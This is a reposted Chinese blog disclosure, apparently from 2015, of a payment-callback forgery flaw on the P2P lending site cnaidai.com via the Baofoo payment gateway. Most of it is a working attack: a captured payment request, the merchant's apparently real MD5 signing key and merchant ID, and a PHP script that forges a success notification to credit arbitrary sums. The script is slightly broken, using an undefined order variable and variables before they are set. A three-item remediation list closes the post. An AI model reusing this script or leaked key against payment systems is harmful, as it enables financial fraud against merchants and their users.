记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

爱贷网高隐匿任意金额充值实战0成本从充值到提现全过程回放及解决方案

2015-05-18 20:40

一直想指出这个问题,终于找到实战案例了,该方案理论上适合目前所有的第三方支付接口!理论上利用该方法刷适当的资金,被发现可能性非常非常小。接触过一些P2P公司,发现大多数厂商都不会拿自家的订单号跟第三方的订单进行一一校对,所以标题使用了“高隐匿”做修饰。测试订单号:B8574120150326181817来看看宝付的《网银支付(借贷分离版)v3.1》交易签名具体算法 Md5Sign = MerchantID + TransID + Result + resultDesc + factMoney + additionalInfo + SuccTime + md5key;其中除了md5key参数没有具体来源,其他参数均可通过充值时抓包获得,很不幸,无意间这个私密key被俺发现了= = 、、、

客户端抓包记录:
 


URL:http://paygate.baofoo.com/PayReceive/bankpay.aspx
POST:
MerchantID:116745
PayID:1000
TradeDate:20150326181817
TransID:B8574120150326181817
OrderMoney:10000.0
ProductName:
Amount:1
ProductLogo:
Username:
Email:
Mobile:
AdditionalInfo:
Merchant_url:http://www.cnaidai.com/public/baofoopay.html
Return_url:http://www.cnaidai.com/public/baofoopay.html
Md5Sign:F58C39C60D5A498586A17439ABB353ED
NoticeType:1

模拟第三方支付向服务器发包:


// 必要修改的参数,其中密钥最重要,其他参数可通过抓充值表单数据包正常获取
$md5_key = "xvaf66u95el7d43e"; // md5密钥(KEY)
$member_id = "116745"; //商户号
$trans_id = "B8574120150326181817"; // 订单编号
$ReturnUrl = "http://www.cnaidai.com/public/baofoopay.html";
$amount = 100;
// TODO:以下代码不必修改
$result = "1";
$result_desc = "01";
$amount = intval($amount) * 100; // 充值金额
$md5_sign = md5($member_id . $trans_id . $result . $result_desc . $amount . $additional_info . $succ_time . $md5_key);
$additional_info = "";
$succ_time = "";
$data = "MerchantID={$member_id}&TransID={$orderid}&Result={$result}&resultDesc={$result_desc}&factMoney={$amount}&additionalInfo={$additional_info}&SuccTime={$succ_time}&Md5Sign={$md5_sign}";
post($ReturnUrl, $data);
function post($url, $data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
curl_close($ch);
}


文中提到的第三方支付参考文档:http://z.download.csdn.net/detail/bigamer/7081105提现我就不测了,我就刷了100块钱到账户,订单编号是B8574120150326181817,你们把相应的金额扣除掉吧!


最后说以下私密泄漏来源,最近翻了一下总表记录大于1G的弱密码库,顺便就把你们家翻出来了,这台服务器是你们家的开发环境还是?详看截图!

解决方案:

1.3306端口不对外开放
2.记录第三方回调时的ip
3.修改所有第三方支付的相关私密key
 

知识来源: www.2cto.com/Article/201505/399605.html

阅读:100065 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“爱贷网高隐匿任意金额充值实战0成本从充值到提现全过程回放及解决方案”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云